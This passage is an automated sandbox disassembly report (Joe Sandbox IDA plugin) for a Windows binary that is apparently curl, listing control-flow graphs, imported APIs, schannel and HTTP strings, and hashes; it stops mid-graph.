                                        • String ID: (memory blob)$Microsoft Unified Security Protocol Provider$P12$Unable to set ciphers to passed via SSL_CONN_CONFIG$schannel: AcquireCredentialsHandle failed: %s$schannel: Failed to get certificate from file %s, last error is 0x%x$schannel: Failed to get certificate location or file for %s$schannel: Failed to import cert file %s, last error is 0x%x$schannel: Failed to import cert file %s, password is bad$schannel: Failed to open cert store %x %s, last error is 0x%x$schannel: Failed to read cert file %s$schannel: certificate format compatibility error for %s$schannel: unable to allocate memory
                                        • API String ID: 2859572553-531812395
                                        • Opcode ID: 9d068f5e5b81ba0ce6fa461c56a4cbed7f46ded8d0df0e432d7278cba46110eb
                                        • Instruction ID: ed28636ce467a8e396fe6b3a495e368fb3341a08ac4743fcf8bbd28c0cac4a1a
                                        • Opcode Fuzzy Hash: 9d068f5e5b81ba0ce6fa461c56a4cbed7f46ded8d0df0e432d7278cba46110eb
                                        • Instruction Fuzzy Hash: B102B9B1A00626DBDB249F64DD84BED77B9FF44314F1040AAFA59A72C1DBB05E808F91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 955 dd33a-dd356 GetModuleHandleA 956 dd35c-dd37e GetProcAddress _mbspbrk 955->956 957 dd47e-dd481 955->957 958 dd391-dd393 956->958 959 dd380-dd382 956->959 962 dd3bf-dd3ce GetSystemDirectoryA 958->962 963 dd395-dd3a5 GetProcAddress 958->963 960 dd388-dd38f LoadLibraryA 959->960 961 dd384-dd386 959->961 967 dd3b8-dd3ba 960->967 966 dd3ac-dd3b6 LoadLibraryExA 961->966 964 dd47b-dd47d 962->964 965 dd3d4-dd3d6 962->965 963->962 968 dd3a7 963->968 964->957 969 dd3d9-dd3de 965->969 966->967 967->964 968->966 969->969 971 dd3e0-dd400 malloc 969->971 973 dd469-dd47a free 971->973 974 dd402-dd40e GetSystemDirectoryA 971->974 973->964 974->973 975 dd410-dd412 974->975 977 dd415-dd41a 975->977 977->977 978 dd41c-dd427 977->978 979 dd42a-dd42f 978->979 979->979 980 dd431-dd435 979->980 981 dd437-dd43f 980->981 981->981 982 dd441-dd446 981->982 983 dd45d-dd461 LoadLibraryA 982->983 984 dd448-dd45b 982->984 985 dd467 983->985 984->985 985->973
                                        APIs
                                        • GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernel32,?,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD34B
                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,LoadLibraryExA,?,?,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD363
                                        • _mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(security.dll,00117348,?,?,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD374
                                        • LoadLibraryA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1(security.dll,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD389
                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(000F4EA1,AddDllDirectory,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD39D
                                        • LoadLibraryExA.KERNELBASE(?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD3B6
                                        • GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000,00000000,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD3C1
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD3F6
                                        • GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD406
                                        • LoadLibraryA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1(000F4EA1,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD461
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,000F4EA1,?,?,000DD2C2), ref: 000DD478
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$AddressDirectoryProcSystem$HandleModule_mbspbrkfreemalloc
                                        • String ID: AddDllDirectory$LoadLibraryExA$kernel32$security.dll
                                        • API String ID: 184734234-2138446276
                                        • Opcode ID: a4bdf05f0085780a8463dba32719a35e94af5db13526fca202d54dee989e35d0
                                        • Instruction ID: c1f317bbc36b632ad3852d72bf0a6ba9d48bfffb2f1e589a55082b1283c299f5
                                        • Opcode Fuzzy Hash: a4bdf05f0085780a8463dba32719a35e94af5db13526fca202d54dee989e35d0
                                        • Instruction Fuzzy Hash: 41413A35A00711FBCB195F64ED186AE3BB6EF85700714806BEC42E7751CB315E428BA1

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1087 10699f-1069d6 socket 1088 106b63 1087->1088 1089 1069dc-106a1a htonl setsockopt 1087->1089 1092 106b65-106b73 call 110ca6 1088->1092 1090 106a20-106a2f bind 1089->1090 1091 106b4b-106b5d closesocket * 3 1089->1091 1090->1091 1093 106a35-106a46 getsockname 1090->1093 1091->1088 1093->1091 1095 106a4c-106a50 1093->1095 1095->1091 1097 106a56-106a61 listen 1095->1097 1097->1091 1098 106a67-106a79 socket 1097->1098 1098->1091 1099 106a7f-106a8e connect 1098->1099 1099->1091 1100 106a94-106aad ioctlsocket 1099->1100 1100->1091 1101 106ab3-106ae1 call ef35e accept 1100->1101 1101->1091 1104 106ae3-106afc getsockname 1101->1104 1104->1091 1105 106afe-106b04 1104->1105 1105->1091 1106 106b06-106b1c getpeername 1105->1106 1106->1091 1107 106b1e-106b22 1106->1107 1107->1091 1108 106b24-106b2c 1107->1108 1108->1091 1109 106b2e-106b34 1108->1109 1109->1091 1110 106b36-106b3e 1109->1110 1110->1091 1111 106b40-106b49 closesocket 1110->1111 1111->1092
                                        APIs
                                        • socket.WS2_32(00000002,00000001,00000006), ref: 001069C9
                                        • htonl.WS2_32(7F000001), ref: 001069F0
                                        • setsockopt.WS2_32(00000000,0000FFFF,00000004,?,00000004), ref: 00106A12
                                        • bind.WS2_32(00000000,?,00000010), ref: 00106A27
                                        • getsockname.WS2_32(00000000,?,00000010), ref: 00106A3E
                                        • listen.WS2_32(00000000,00000001), ref: 00106A59
                                        • socket.WS2_32(00000002,00000001,00000000), ref: 00106A6F
                                        • connect.WS2_32(00000000,?,00000010), ref: 00106A86
                                        • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00106AA5
                                        • accept.WS2_32(00000000,00000000,00000000), ref: 00106AD6
                                        • getsockname.WS2_32(?,?,00000010), ref: 00106AF4
                                        • getpeername.WS2_32(?,?,00000010), ref: 00106B14
                                        • closesocket.WS2_32(00000000), ref: 00106B41
                                        • closesocket.WS2_32(00000000), ref: 00106B4C
                                        • closesocket.WS2_32(?), ref: 00106B54
                                        • closesocket.WS2_32(?), ref: 00106B5D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: closesocket$getsocknamesocket$acceptbindconnectgetpeernamehtonlioctlsocketlistensetsockopt
                                        • String ID:
                                        • API String ID: 2616969812-0
                                        • Opcode ID: 0528490e5bcada4e82630cfc699d4169584751bb1e0b72da86244b0d9f3bb20d
                                        • Instruction ID: ad765eb77750555692482611afad1f5acbdc535f9f45d9fc9ff9a03371c9e5f3
                                        • Opcode Fuzzy Hash: 0528490e5bcada4e82630cfc699d4169584751bb1e0b72da86244b0d9f3bb20d
                                        • Instruction Fuzzy Hash: 7D5162B1A00509EFDB109FA0DD85BEEBBBAFF08310F508525F641F6190DBB099948B64
                                        APIs
                                        • fputc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000D15D6
                                        • fputc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000D1616
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: fputc
                                        • String ID: %ld$.%ld$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                        • API String ID: 1992160199-2365385051
                                        • Opcode ID: 62344202391d2d6d670db1137f7b9eea0ac98986d8fe51ad47d440c7f159ff79
                                        • Instruction ID: d060205c034113d6d0b6fa132fdb0a7768da39a80186c8386ae5cfa9518f9d5a
                                        • Opcode Fuzzy Hash: 62344202391d2d6d670db1137f7b9eea0ac98986d8fe51ad47d440c7f159ff79
                                        • Instruction Fuzzy Hash: 9D629E71208741AFD768CF28D8947AABBE2EFD4754F244A2FF49186391CF70C8458B62
                                        APIs
                                        • recv.WS2_32(?,?,?,00000000), ref: 000DDB81
                                        • WSAGetLastError.WS2_32(?,?,?,00000000), ref: 000DDB8E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ErrorLastrecv
                                        • String ID:
                                        • API String ID: 2514157807-0
                                        • Opcode ID: 8cbaf5c83020ac08fc6d9424167e596624048c7d2ab4b8ed2af15b06c0d0f1c5
                                        • Instruction ID: 6fd389ce4de96bfece390164464adbc4731a9ee3eb1b9c74615cc540c30aa20a
                                        • Opcode Fuzzy Hash: 8cbaf5c83020ac08fc6d9424167e596624048c7d2ab4b8ed2af15b06c0d0f1c5
                                        • Instruction Fuzzy Hash: 68E09271244708AFEB188B70EC45B7937A9DB85730F20C15AFD198A7D0D67199808650
                                        APIs
                                        • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,000CD002,?,?,?,?,?,?,?,000CCD94,000CD002,?,?,?), ref: 000C9374
                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(More details here: https://curl.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentioned abo,00000002,?,?,00000000,000CD002), ref: 000C93D4
                                        • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C9449
                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C94A2
                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00117668,?), ref: 000C9775
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C978C
                                        • _unlink.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000078,?,00000000,000CD002), ref: 000C97DA
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000078,?,00000000,000CD002), ref: 000C9843
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,000CD002), ref: 000C988B
                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C9927
                                        • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C993A
                                        • _get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C9943
                                        • _lseeki64.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,00000000), ref: 000C9952
                                        • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,000CD002), ref: 000C9968
                                        • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000002,?,?,?,?,?,?,?,00000000,000CD002), ref: 000C997C
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C9AA7
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C9ABD
                                        Strings
                                        • Problem %s. Will retry in %ld seconds. %ld retries left., xrefs: 000C98B3
                                        • curl: (23) Failed seeking to end of file, xrefs: 000C9991
                                        • Removing output file: %s, xrefs: 000C97CA
                                        • Failed to set filetime %I64d on outfile: CreateFile failed: GetLastError %u, xrefs: 000C9A6D
                                        • curl: (%d) The requested URL returned error: %ld, xrefs: 000C9416
                                        • Failed to set filetime %I64d on outfile: SetFileTime failed: GetLastError %u, xrefs: 000C9A45
                                        • curl: (%d) %s, xrefs: 000C93B0
                                        • curl: (23) Failed to truncate file, xrefs: 000C99BD
                                        • Failed to set filetime %I64d on outfile: overflow, xrefs: 000C986F
                                        • curl: (%d) Failed writing body, xrefs: 000C94BF, 000C97A9
                                        • Throwing away %I64d bytes, xrefs: 000C9913
                                        • More details here: https://curl.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentioned abo, xrefs: 000C93CF
                                        • M', xrefs: 000C956B
                                        • The Retry-After: time would make this command line exceed the maximum allowed time for retries., xrefs: 000C974C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _filenofclosefflushfputsfree$File_close_get_osfhandle_lseeki64_strdup_unlinkfseek
                                        • String ID: Failed to set filetime %I64d on outfile: CreateFile failed: GetLastError %u$Failed to set filetime %I64d on outfile: SetFileTime failed: GetLastError %u$Failed to set filetime %I64d on outfile: overflow$M'$More details here: https://curl.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentioned abo$Problem %s. Will retry in %ld seconds. %ld retries left.$Removing output file: %s$The Retry-After: time would make this command line exceed the maximum allowed time for retries.$Throwing away %I64d bytes$curl: (%d) %s$curl: (%d) Failed writing body$curl: (%d) The requested URL returned error: %ld$curl: (23) Failed seeking to end of file$curl: (23) Failed to truncate file
                                        • API String ID: 968532693-3733868149
                                        • Opcode ID: 47d076c3c7849488b1e8e64dd0d0148d139d145ae76e897e663a6be7f112f079
                                        • Instruction ID: c927833e8b2acdad620c181dc368fd9d40828a4067dbaa286c5e9f1c4b410e2a
                                        • Opcode Fuzzy Hash: 47d076c3c7849488b1e8e64dd0d0148d139d145ae76e897e663a6be7f112f079
                                        • Instruction Fuzzy Hash: F2329871A00205EFEB699FA8D889FEEBBF5FF04300F14406DE415A62A2D775AD90CB50

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 359 104585-1045d3 360 1045f0 359->360 361 1045d5-1045e6 359->361 362 1045f3-10461a call d0b38 360->362 361->360 363 1045e8-1045ee 361->363 366 104629-104630 362->366 367 10461c-104628 call dd632 362->367 363->362 369 104632-10464b GetModuleHandleA GetProcAddress 366->369 370 104667 366->370 367->366 369->370 373 10464d-104661 call d0b38 369->373 371 104669-10467a 370->371 375 104696 371->375 376 10467c-10468c 371->376 373->370 382 104663-104665 373->382 377 10469c-10469e 375->377 376->375 379 10468e-104694 376->379 380 1046a0-1046a3 377->380 381 1046cf-1046e3 call d0b38 377->381 379->377 384 1046c1 380->384 385 1046a5-1046b7 380->385 389 1046e9 381->389 390 104b1f-104b2c call dd6ad 381->390 382->371 388 1046c7-1046c9 384->388 385->384 387 1046b9-1046bf 385->387 387->388 388->381 391 1046cb-1046cd 388->391 392 1046eb-1046f8 389->392 397 104b2e 390->397 391->392 395 10471a 392->395 396 1046fa-104710 392->396 398 104720-104722 395->398 396->395 399 104712-104718 396->399 400 104b2f-104b3d call 110ca6 397->400 401 104794-10479e call 103d21 398->401 402 104724-104732 call e7060 398->402 399->398 407 1047a3-1047a6 401->407 410 104753 402->410 411 104734-104751 402->411 407->400 409 1047ac-1047b3 407->409 412 1047d5 409->412 413 1047b5-1047cb 409->413 414 10475a-104777 call e708e 410->414 411->410 411->414 415 1047d8-1047e3 call e77af 412->415 413->412 416 1047cd-1047d3 413->416 420 104784-10478e call e7078 414->420 421 104779-104781 414->421 424 1047e5-1047f4 call dd6ad 415->424 425 1047f9-10480b _strdup 415->425 416->415 420->401 426 104814-10482b inet_pton 420->426 421->420 424->397 425->426 427 10480d-10480f 425->427 431 104846-104852 call dd632 426->431 432 10482d-104844 inet_pton 426->432 427->397 433 104853-104857 431->433 432->431 432->433 436 1048c6-1048d4 433->436 437 104859-1048c4 call dd632 433->437 439 1048da-104932 436->439 437->439 441 104954 439->441 442 104934-10494a 439->442 443 10495a-10498d calloc * 2 441->443 442->441 444 10494c-104952 442->444 446 1049a1-1049ee 443->446 447 10498f-10499b call dd6ad 443->447 444->443 452 104a82-104aa4 call dd87f 446->452 453 1049f4-104a25 free 446->453 447->446 455 104aa9-104acf 452->455 457 104a67-104a7a call da216 call dd6ad 453->457 458 104a27-104a2d 453->458 471 104b00-104b17 call dd6ad 455->471 472 104ad1-104ad7 455->472 457->452 459 104a4b-104a62 call da216 call dd6ad 458->459 460 104a2f-104a43 call da216 call dd6ad 458->460 459->397 460->459 471->390 472->471 476 104ad9-104afe 472->476 476->400
                                        APIs
                                        • GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,wine_get_version), ref: 0010463C
                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00104643
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 001047FA
                                        • inet_pton.WS2_32(00000002,?,?), ref: 00104823
                                        • inet_pton.WS2_32(00000017,?,?), ref: 0010483C
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010497C
                                        Strings
                                        • schannel: unable to allocate memory, xrefs: 0010498F
                                        • wine_get_version, xrefs: 00104632
                                        • schannel: using IP address, SNI is not supported by OS., xrefs: 00104846
                                        • schannel: failed to send initial handshake data: sent %zd of %lu bytes, xrefs: 00104B07
                                        • Failed to set SNI, xrefs: 001047E5
                                        • schannel: SNI or certificate check failed: %s, xrefs: 00104A52
                                        • http/1.1, xrefs: 00104859
                                        • /1.1, xrefs: 0010487F
                                        • schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc., xrefs: 0010461C
                                        • http, xrefs: 00104875
                                        • schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 00104B1F
                                        • schannel: initial InitializeSecurityContext failed: %s, xrefs: 00104A38, 00104A6F
                                        • ntdll, xrefs: 00104637
                                        • ALPN: offers %s, xrefs: 0010485E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: inet_pton$AddressHandleModuleProc_strdupcalloc
                                        • String ID: /1.1$ALPN: offers %s$Failed to set SNI$http$http/1.1$ntdll$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
                                        • API String ID: 1589778587-246979986
                                        • Opcode ID: 21d2abae753d726af358d1926870c8c67ebc0e39c51501436aefc22053ca78ed
                                        • Instruction ID: 8b72dc9ab04bda1ed8a146871a0132fd3e4d0292691efb139fc53387b71b591f
                                        • Opcode Fuzzy Hash: 21d2abae753d726af358d1926870c8c67ebc0e39c51501436aefc22053ca78ed
                                        • Instruction Fuzzy Hash: 3CF1C1B0A04214DFEB289F14DC85BE977B5EF46310F1441EAE9899B2C2EBB19D84CF51

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 480 f2f70-f2f95 481 f2fb8-f2fcd call f1c9a 480->481 482 f2f97-f2f9e 480->482 488 f356d-f3573 481->488 489 f2fd3-f2fe4 call ea9f5 481->489 484 f2fb0-f2fb3 482->484 485 f2fa0-f2fa7 482->485 484->488 485->481 487 f2fa9 485->487 487->484 492 f2fe6-f3003 free 489->492 493 f3004-f3023 call f1c1a 489->493 492->493 497 f3045 493->497 498 f3025-f303d call d20e6 493->498 499 f304b-f307e call f0ca5 free 497->499 504 f312b-f312e 498->504 505 f3043 498->505 499->488 507 f3084-f30aa free 499->507 504->488 505->499 509 f30ac-f30bd call ea9f5 507->509 510 f30d6-f30e7 call ea9f5 507->510 509->510 517 f30bf-f30d4 call d20e6 509->517 515 f30e9-f30ef 510->515 516 f3133-f3150 free 510->516 515->516 518 f30f1-f3129 free call d20e6 515->518 523 f3151-f3167 call f206c 516->523 517->504 517->510 518->504 518->523 523->488 528 f316d-f319c call ea9f5 call f2ca5 523->528 528->488 533 f31a2-f31af call f2b7a 528->533 533->488 536 f31b5-f320c call f17ce call dd208 call dd26d 533->536 543 f3562-f3566 call dd126 536->543 544 f3212-f3225 call f1eb9 536->544 547 f356b 543->547 544->543 549 f322b-f3231 544->549 547->488 550 f3233-f3239 549->550 551 f3271-f3276 549->551 550->551 552 f323b-f324e call ea9f5 550->552 553 f327a-f3281 551->553 552->551 559 f3250-f3260 call f03f2 552->559 555 f3283-f328f 553->555 556 f3291 553->556 555->556 558 f3295-f329d 555->558 556->558 560 f329f-f32a2 558->560 561 f32b2 558->561 559->551 570 f3262-f326f 559->570 560->561 564 f32a4-f32b0 560->564 562 f32b6-f32cf 561->562 565 f32e4 562->565 566 f32d1-f32d4 562->566 564->561 564->562 569 f32e8-f32ef 565->569 566->565 568 f32d6-f32e2 566->568 568->565 568->569 571 f32ff 569->571 572 f32f1-f32fd 569->572 570->553 573 f3303-f33c7 call dd26d free * 3 571->573 572->571 572->573 573->543 579 f33cd-f33d7 573->579 580 f33d9-f33e0 579->580 581 f33f8-f340b call f2995 579->581 580->581 582 f33e2-f33e9 580->582 587 f355a 581->587 588 f3411-f3420 call f1b0a 581->588 582->581 584 f33eb-f33f3 582->584 586 f355e 584->586 586->543 587->586 588->587 591 f3426-f3439 call f187b 588->591 591->587 594 f343f-f344c 591->594 595 f344e-f3451 594->595 596 f3453-f345c call efaf9 594->596 595->596 597 f345f-f3469 call f2295 595->597 596->597 601 f346e-f3474 597->601 601->587 602 f347a-f3487 601->602 603 f3489 602->603 604 f34b2-f34c2 602->604 605 f348b-f348e 603->605 606 f3490-f3496 603->606 607 f353f-f3546 604->607 608 f34c4-f34e9 call f0211 604->608 605->604 605->606 606->604 610 f3498 606->610 607->547 611 f3548-f354f 607->611 608->607 616 f34eb-f3524 call dd632 608->616 613 f349a-f34a0 610->613 614 f34a2-f34a9 610->614 611->547 615 f3551-f3558 611->615 613->604 613->614 614->604 617 f34ab 614->617 615->547 620 f3531-f3533 616->620 617->604 621 f3526-f352c 620->621 622 f3535 620->622 623 f352e 621->623 624 f3537-f353e call ec9e4 621->624 622->607 623->620 624->607
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F2FFA
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F3075
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F3098
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F3105
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F3147
                                          • Part of subcall function 000F2B7A: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F2BB8
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F3386
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F33A4
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F33BE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: HTTP/%s%s%s%s%s%s%s%s%s%s%s%s%s$%s $%s?%s$1.0$1.1$Accept$Accept-Encoding$Accept-Encoding: %s$Accept: */*$Proxy-Connection$Proxy-Connection: Keep-Alive$Referer$Referer: %s$User-Agent$upload completely sent off: %I64d out of %I64d bytes
                                        • API String ID: 1294909896-3403769770
                                        • Opcode ID: 75551b7e84dccc3e7fd0f8aa8e67ac5e72c261df2bea16ee604d9dfce7a23de1
                                        • Instruction ID: f99d102be7cdc78f4730a1d92f1dcd1a4ba506c6ce42274892570732645ec576
                                        • Opcode Fuzzy Hash: 75551b7e84dccc3e7fd0f8aa8e67ac5e72c261df2bea16ee604d9dfce7a23de1
                                        • Instruction Fuzzy Hash: F202E531704706AFDB59CB24D840BBAB7E2FFC4320F14462EE95897691DB30ED51AB92

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 627 c1fdc-c1fff 628 c221b-c2221 call c913e 627->628 629 c2005-c2007 627->629 634 c2226-c2227 628->634 629->628 630 c200d-c2015 629->630 632 c204b-c2054 630->632 633 c2017-c201a 630->633 635 c205a-c205c 632->635 636 c21b6-c21c9 fopen 632->636 633->632 637 c201c-c2032 call d20e6 633->637 638 c2228 634->638 639 c205e-c2061 635->639 640 c2067-c2080 call d0b16 635->640 641 c21cb-c21e4 _errno strerror call c913e 636->641 642 c21f5-c2219 free 636->642 650 c2034 637->650 651 c2046-c2049 637->651 644 c222a-c222e 638->644 639->636 639->640 652 c2082-c208e _errno 640->652 653 c2093-c209f 640->653 649 c21e9-c21f3 free 641->649 642->644 649->638 654 c2039-c2041 call c9199 650->654 651->632 652->640 655 c2090 652->655 656 c20a5-c20a8 653->656 657 c2191-c2194 653->657 654->634 655->653 659 c2196-c21a8 _fdopen 656->659 660 c20ae-c20b3 656->660 657->641 657->659 659->642 662 c21aa-c21b4 _close 659->662 663 c20b6-c20bb 660->663 662->641 663->663 664 c20bd-c20c7 663->664 665 c20dc-c20e9 malloc 664->665 666 c20c9-c20d7 free 664->666 667 c20eb-c2102 call c9199 free 665->667 668 c2107-c211b call 112780 665->668 666->654 667->638 673 